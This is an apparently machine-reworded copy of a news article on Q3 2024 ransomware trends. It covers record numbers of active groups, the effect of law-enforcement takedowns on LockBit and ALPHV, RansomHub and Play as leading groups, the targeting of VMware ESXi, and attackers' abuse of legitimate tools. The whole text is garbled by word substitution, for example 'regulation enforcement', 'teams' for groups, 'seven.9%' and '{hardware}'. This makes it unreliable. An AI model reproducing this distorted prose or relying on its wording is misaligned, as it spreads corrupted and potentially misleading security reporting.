This yr has seen the best variety of lively ransomware teams on file, with 58 attacking world companies within the second quarter. Risk intelligence platform supplier Cyberint has reported solely a slight dip within the third quarter, with 57 lively teams.
Moreover, in Q3, the highest 10 ransomware teams have been chargeable for solely 58.3% of all detected assaults. This displays each the rise within the variety of lively teams basically and a decline in exercise from the bigger gamers because of profitable regulation enforcement takedowns, equivalent to these of ALPHV and Dispossessor.
Adi Bleih, safety researcher at Cyberint, informed TechRepublic in an electronic mail: “The variety of lively ransomware teams having reached an all-time excessive implies that companies face an elevated danger of assaults as every of those competing gangs should now vie for targets. The competitors between totally different ransomware teams has fuelled more and more frequent assaults, leaving little or no room for error on the a part of enterprise cybersecurity groups.
“Whereas safety gaps and vulnerabilities might have beforehand gone unnoticed, the proliferation of ransomware teams, with all of them scouring the online for his or her subsequent victims, implies that even minor errors can now rapidly result in main safety incidents.”
Probably the most prolific ransomware teams are succumbing to regulation enforcement operations
Certainly, separate analysis from WithSecure discovered that of the 67 ransomware teams tracked in 2023, 31 have been now not operational as of Q2 2024. NCC Group additionally famous a year-over-year decline in ransomware assaults in each June and July this yr, which consultants linked to the LockBit disruption.
SEE: LockBit Again On-line as Ransomware Gang Continues to Conflict with Regulation Enforcement
LockBit particularly used to account for almost all of assaults, however with solely 85 assaults within the third quarter, it attacked nearly 60% much less firms than it did the second, based on Cyberint’s report. This marks the group’s lowest variety of quarterly assaults in a yr and a half.
An August report from Malwarebytes additionally discovered that the proportion of ransomware assaults that LockBit claimed accountability for fell from 26% to twenty% over the previous yr, regardless of finishing up extra particular person assaults.
ALPHV, the second-most prolific ransomware group, additionally created a emptiness after a sloppily executed cyber assault towards Change Healthcare in February. The group didn’t pay an affiliate their share of the $22 million ransom, so the affiliate uncovered them, prompting ALPHV to pretend a regulation enforcement takeover and stop operations.
SEE: Timeline: 15 Notable Cyberattacks and Information Breaches
These observations counsel that regulation enforcement takedowns are proving efficient towards the more-established gangs whereas concurrently opening up new alternatives for smaller teams. The Malwarebytes analysts added that the brand new gangs “are sure to be making an attempt to draw their associates and supplant them because the dominant forces in ransomware.”
However Cyberint analysts are optimistic in regards to the ripple impact of takedown operations on smaller gamers, writing: “As these massive operations wrestle, it’s solely a matter of time earlier than different huge and small ransomware teams comply with the identical path. The continued crackdown has created a extra hostile surroundings for these teams, signaling that their dominance might not final for much longer.”
Certainly, as an alternative of constant the upwards pattern from the second quarter, the place the variety of ransomware assaults elevated by nearly 21.5%, the Cyberint researchers discovered the 1,209 instances in Q3 really marked a 5.5% lower.
SEE: International Cyber Assaults to Double from 2020 to 2024, Report Finds
Probably the most outstanding ransomware group of the quarter was RansomHub, because it was chargeable for 16.1% of all instances, claiming 195 new victims. Outstanding assaults embody these on world producer Kawasaki and oil and gasoline companies firm Halliburton. The Cyberint analysts say that the group’s roots are possible in Russia and that it has connections to former associates of the now-inactive ALPHV group.
Second within the listing of most lively ransomware teams is Play, which claimed 89 victims and seven.9% of all instances. It has purportedly executed over 560 profitable assaults since June 2022, with probably the most outstanding one from this yr concentrating on the VMWare ESXi surroundings.
“If not hindered, Play goes to interrupt its personal file of yearly victims in 2024 (301),” the analysts wrote.
Ransomware teams concentrating on Linux and VMWare ESXi Programs
The Cyberint report famous a pattern that ransomware teams are closely specializing in concentrating on Linux-based methods and VMware ESXi servers.
VMware ESXi is a bare-metal hypervisor that allows the creation and administration of digital machines straight on server {hardware}, which can embody crucial servers. Compromising the hypervisor can enable attackers to disable a number of digital machines concurrently and take away restoration choices equivalent to snapshots or backups, making certain vital influence on a enterprise’s operations.
Ransomware teams Play and Cicada3301 developed ransomware that particularly targets VMWare ESXi servers, whereas Black Basta has exploited vulnerabilities that enables them to encrypt all of the information for the VMs.
SEE: Black Basta Ransomware Struck Extra Than 500 Organizations Worldwide
Linux methods additionally usually host VMs and different crucial enterprise infrastructure. Such focus highlights cyberattackers’ curiosity within the large payday out there from executing most injury on company networks.
Attackers are utilizing customized malware and exploiting legit instruments
The sophistication of ransomware teams’ methods has elevated significantly over the previous yr, with Cyberint researchers observing attackers utilizing customized malware to bypass safety instruments. For instance, the Black Basta gang used a variety of customized instruments after gaining preliminary entry to focus on environments.
Attackers are additionally exploiting legit safety and cloud storage instruments to evade detection. RansomHub was noticed utilizing Kaspersky’s TDSSKiller rootkit remover to disable endpoint detection and response and the LaZagne password restoration software to reap credentials. Plus, a number of teams have used Microsoft’s Azure Storage Explorer and AzCopy instruments to steal company information and retailer it in cloud-based infrastructure.
Bleih informed TechRepublic: “As these gangs grow to be extra profitable and well-funded, they grow to be more and more refined and function equally to a legit enterprise. Whereas we regularly see the identical tried-and-true assault vectors used – phishing assaults, using stolen credentials, exploitation of vulnerabilities on Web-facing property – they’re changing into extra artistic in how they execute these widespread methods.
“They’re additionally changing into more and more agile and scalable. As an example, whereas menace actors have at all times been technically adept, they’re now capable of begin exploiting new vulnerabilities at scale just some days after a crucial CVE is documented. Prior to now, this may increasingly have taken weeks or maybe longer.”